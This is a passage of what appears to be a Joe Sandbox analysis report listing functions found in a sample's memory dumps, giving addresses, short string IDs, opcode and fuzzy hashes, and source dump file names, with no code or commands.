                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ~
                                                                                                                                                                                                                                                                          • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                          • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                          • Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791
                                                                                                                                                                                                                                                                          Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: RpB
                                                                                                                                                                                                                                                                          • API String ID: 0-664042118
                                                                                                                                                                                                                                                                          • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                          • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                                          Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: d1
                                                                                                                                                                                                                                                                          • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                          • Opcode ID: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
                                                                                                                                                                                                                                                                          • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                                          Function 0043D830 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                                          • Opcode ID: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                          • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                                          Function 024CDA97 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                          • API String ID: 0-4216504194
                                                                                                                                                                                                                                                                          • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                          • Instruction ID: 1b2747d12fbd72633825edd75b6ffa621c34162411ae735f4f7cc1ee0948dd35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83816839E083508FC764DF18C890A7BB7A1EFD6714F28893DD99557395D731A802C782
                                                                                                                                                                                                                                                                          Function 024A734A Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                          • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                          • Instruction ID: 7bba0880d928a25eaad3b9bb39324819c2d9da175eeb1b20af991ab9db3c7655
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6891F3716107428FD724CF39C850BAAB7D2EB96314F18C57EC196CB7A6DB78A442C740
                                                                                                                                                                                                                                                                          Function 024A77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                          • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                          • Instruction ID: 34d734b052877dbdf523287f9c605fbc5785e0f76673639941e077e5292fae27
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E49199B0101741CFE7648F25C8A0B63BBB2FF56318F19958DC4864FBA1E379A846CB94
                                                                                                                                                                                                                                                                          Function 0042B12C Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                          • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                          • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                                                                                                                                                                                                                                          Function 024BB393 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                          • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                          • Instruction ID: 9c7a63674a44cca28130444adee5b853dcc1578d22365309ea90ef27fe7bfab9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B381B47121D3808AD7698F25C8617FBBBD3EFD2208F18996DC5D987392DB38400ACB16
                                                                                                                                                                                                                                                                          Function 00405EB0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                          • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                          • Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                                          Function 02496117 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                          • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                          • Instruction ID: fe37f661478e41877cd002850274ed80e222f2b3f77b5fa52f2da8a71bf084cc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB148702083819FC725CF28C98061BFFE5AFA9604F444A2EE5D997342D631E918CBA6
                                                                                                                                                                                                                                                                          Function 0041B0E1 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: js{g
                                                                                                                                                                                                                                                                          • API String ID: 0-1014319796
                                                                                                                                                                                                                                                                          • Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                                          • Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44
                                                                                                                                                                                                                                                                          Function 024AB348 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: js{g
                                                                                                                                                                                                                                                                          • API String ID: 0-1014319796
                                                                                                                                                                                                                                                                          • Opcode ID: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                                          • Instruction ID: 2468ada4c654de61762f469bfbfe42d3be9b46642c3a8d6a76d6742e375fdc54
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8811671655B804BE7398F35C8617A7BBE2AB52718F08895DD5C39BF85C778E406CB00
                                                                                                                                                                                                                                                                          Function 0041714B Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-1553575800
                                                                                                                                                                                                                                                                          • Opcode ID: 09c846a2afc331d85edad14330251619ebe1679237f5647bd4b68f37056fbcaf
                                                                                                                                                                                                                                                                          • Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c846a2afc331d85edad14330251619ebe1679237f5647bd4b68f37056fbcaf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744
                                                                                                                                                                                                                                                                          Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: cdcb811f3b6eb00ba9c047de99187d2b4a3705ee1c65ea447f98f9511ad803bb
                                                                                                                                                                                                                                                                          • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcb811f3b6eb00ba9c047de99187d2b4a3705ee1c65ea447f98f9511ad803bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                          Function 024CD557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                          • Instruction ID: 6b8f5fe0cc72ad51f6b5591bbed2a957451959d292013d7bf185c2e6d6f1656a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3881B178A05201DFD754DF2CC880A6BB7E2EF99714F29953DE5858B3A1DB31E841CB42
                                                                                                                                                                                                                                                                          Function 024A73B2 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                          • Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                          • Instruction ID: d2810210684c591eb7031903a7fe504f0981c3e88daa508caa2b90471dfbc36d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2871D3717047414FD325CF39C8607AABBD2AB95314F18C57EC496CB7A6EA79E442CB40
                                                                                                                                                                                                                                                                          Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                          Function 024BA637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: 65632e723c189e4064236202250ffe9fae7105dc8b93c79f62f27da13805b71f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8771D432A083658BD7268E3CC48039EBBE2AFC5714F19892FE49497791D335DC46CB92
                                                                                                                                                                                                                                                                          Function 00424502 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: DB
                                                                                                                                                                                                                                                                          • API String ID: 0-3908451873
                                                                                                                                                                                                                                                                          • Opcode ID: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                          • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                                          Function 00424A74 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
